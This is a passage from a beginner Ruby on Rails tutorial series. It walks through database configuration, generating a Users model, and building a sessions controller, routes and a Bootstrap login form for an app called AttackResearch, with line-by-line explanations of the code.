Also, we should briefly cover how you connect to a database with Rails. In this tutorial, we will stick with the default configuration/database, SQLite. Navigate to config/database.yml:
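
The portion we care about is the development section, which in the default file looks like this (the line number mentioned below refers to the full file, which includes comments):

development:
  adapter: sqlite3
  database: db/development.sqlite3
  pool: 5
  timeout: 5000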


If you remember Part 2 of the series, we covered the 3 default modes of Rails. This is the reason there are 3 different database configurations in this file. It is useful, as your local development environment database will differ from production (ex: the database username, password, and host would/should be different).

When we are running in development mode, the database we will be using will be db/development.sqlite3, as specified on line 8. The naming convention refers to its location and filename.

So nothing really to change there, let's go ahead and create the model.
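
The command (note the plural "Users" - a mistake we will correct at the start of Part 5):

$ rails g model Users first_name:string last_name:string email:string password_hash:string password_salt:string admin:boolean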


Command(s) Breakdown:
  • rails - Invoking a Rails command
  • g - Short for generate, used to generate Rails items
  • model - specifies that we are generating a model
  • Users - the name of the model, which actually refers to both the model (app/models/users.rb) and a table in the database
  • first_name:string (etc.) - The first portion is the name of the column in the table and the second part (string) identifies the variable type to be stored in the database.
Now, upon generation, the model is created but the db table/columns do not yet exist. To make this happen, let's run rake db:migrate.


To give you a visual of what was just created...

Note the table "users" has been created along with the columns we identified during model creation.
This is great, and later, if you'd like to add an additional column to your local db, you can. What if you'd like to add a column so that the next person to download your code and run rake db:migrate also has the new column? Navigate to db/migrate/ and you'll see a file that ends in _create_users.rb. This is where you would make that change. Do NOT edit the db/schema.rb file for that purpose (it is overwritten by the migrate files).

Next, create a sessions controller:
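
Again, via the generator:

$ rails g controller Sessions new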



Time to add code to the session controller (app/controllers/sessions_controller.rb).
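
A sketch of where the controller should end up (laid out so the line references below match):

class SessionsController < ApplicationController
  def new
  end

  def create
    user = User.authenticate(params[:email], params[:password])
    if user
      session[:user_id] = user.id
      redirect_to home_path
    else
      render "new"
    end
  end
end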



Notice the new and create actions. The gist of this, AFAIK, is that Rails uses new to instantiate a new instance of the Model object, and create will actually save data and perform some of the more permanent actions. For our purposes, the "GET" request to sessions#new and the new.html.erb file will show a login form. Once 'POST'-ing from that login form, the create method will receive the email and password parameters.

Code Breakdown:

Line 6 - Calls a method in the User model (authenticate).
Line 8 - Stores the user's ID in the session
Line 9 - redirects to a home path once authenticated
Line 11 - A user did not authenticate correctly and we want to send them back to the login page.

The next thing we need to discuss is the set of changes to your routes.rb file:
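
A sketch (assuming the app was generated with the name AttackResearch, and arranged so the line numbers below match):

AttackResearch::Application.routes.draw do

  match "logout" => "sessions#destroy", :as => "logout"
  match "login"  => "sessions#new",     :as => "login"
  match "signup" => "users#new",        :as => "signup"

  # The root of the site is now the login form
  root :to => "sessions#new"

  resources :users
  resources :sessions
  resources :home
end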


Line 3 - The first portion (ex: logout) identifies a request for that resource, which goes to sessions#destroy.
Line 8 - Our root has changed to the login page (app/views/sessions/new.html.erb)
Lines 10-12 - We've identified resources (controllers) and instantiated some default routes. 7 to be exact:

You can run `rake routes` to see these.

7 routes automatically created for the actions: index, create, new, edit, show, update, destroy
Note that these 7 routes were not manually defined by you in your routes file; rather, Rails created them for you. This is because you specified `resources :<controller name>` in your routes.rb file. You can create views and controller actions whose names match those 7 defined routes (index, create, etc.). They automagically have routes!
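
Next up is the login form itself, /app/views/sessions/new.html.erb. A sketch (arranged so the line numbers in the breakdown below match):

<h1>Login</h1>

<div class="well">

<%= form_tag sessions_path do %>

  <%= label_tag :email %>
  <%= text_field_tag :email, params[:email] %>


  <%= label_tag :password %>
  <%= password_field_tag :password %>

  <%= submit_tag "Login", {:class => "btn btn-primary"} %>

<% end %>

</div>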


Code breakdown:

Line 5 - form_tag is a Rails method, notice how we encapsulate it in <%= %>. This is how we separate Rails code from regular HTML. You may also see <% %>.
Line 7, 8, 11, 12 - Rails methods that are converted by Rails to define labels and input fields.
Line 14 - submit_tag, again, a Rails method. Note the {:class => "btn btn-primary"}. This is a Twitter-Bootstrap definition you can find here.

Now fire up your instance, you should see the following:

Note: You can't necessarily use this yet but it looks nice :-)
This was a lot of information (read: lengthy post) and while the login does not yet work, we will wrap all of this up in Part 5 of the series. While part 5 of this series will walk you through the details of the code, you can always skip ahead and grab it from this Railscast (if you'd like to finish up).

Thanks!




cktricky